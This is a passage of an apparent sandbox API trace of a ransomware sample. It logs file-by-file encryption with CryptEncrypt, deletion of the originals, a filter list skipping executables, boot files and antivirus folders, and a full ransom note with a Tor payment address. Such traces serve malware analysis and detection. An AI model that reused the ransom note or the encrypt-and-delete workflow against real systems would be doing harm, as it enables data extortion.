nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.219] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.219] GetLastError () returned 0x0 [0159.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.220] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.220] GetLastError () returned 0x0 [0159.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.220] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.220] GetLastError () returned 0x0 [0159.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.220] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.220] GetLastError () returned 0x0 [0159.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.220] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.220] GetLastError () returned 0x0 [0159.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.220] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui")) returned 0x20 [0159.220] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.221] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui") returned 1 [0159.221] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui")) returned 0 [0159.221] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" [0159.221] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP") returned 1 [0159.221] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\.xXE143.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\.xxe143.tmp")) returned 0xe143 [0159.222] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\.xXE143.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\.xxe143.tmp"), dwFlags=0x1) returned 0 [0159.222] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\.xXE143.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\.xxe143.tmp")) returned 1 [0159.222] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0159.222] wcslen (_String="OK") returned 0x2 [0159.222] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.222] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.222] CryptDestroyKey (hKey=0x9ad238) returned 1 [0159.222] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0159.222] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0159.222] FindNextFileW (in: hFindFile=0x9ad378, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.222] GetLastError () returned 0x12 [0159.222] FindClose (in: hFindFile=0x9ad378 | out: hFindFile=0x9ad378) returned 1 [0159.222] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.223] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.223] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.223] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.223] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.223] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.223] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.223] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.223] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*.exe") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*.dll") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*.lnk") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*.bat") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*.ini") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*.msi") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*.scf") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*pagefile.sys*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*AppData*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*\\winrar\\*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*\\java\\*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*\\windows\\*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*\\ESET\\*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*\\AVG\\*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*Atheros*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*Realtek*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*bootmgr*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*boot*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*boot*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*IO.SYS*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*ntldr*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*chrome*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*opera*") returned 0 [0159.224] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", pszSpec="*firefox*") returned 0 [0159.224] wcslen (_String="\\\\?\\") returned 0x4 [0159.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad338 [0159.225] wcscmp (_String1=".", _String2=".") returned 0 [0159.225] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.225] wcscmp (_String1="..", _String2=".") returned 1 [0159.225] wcscmp (_String1="..", _String2="..") returned 0 [0159.225] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.225] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.226] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.226] strlen (_Str="NMoreira") returned 0x8 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.226] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 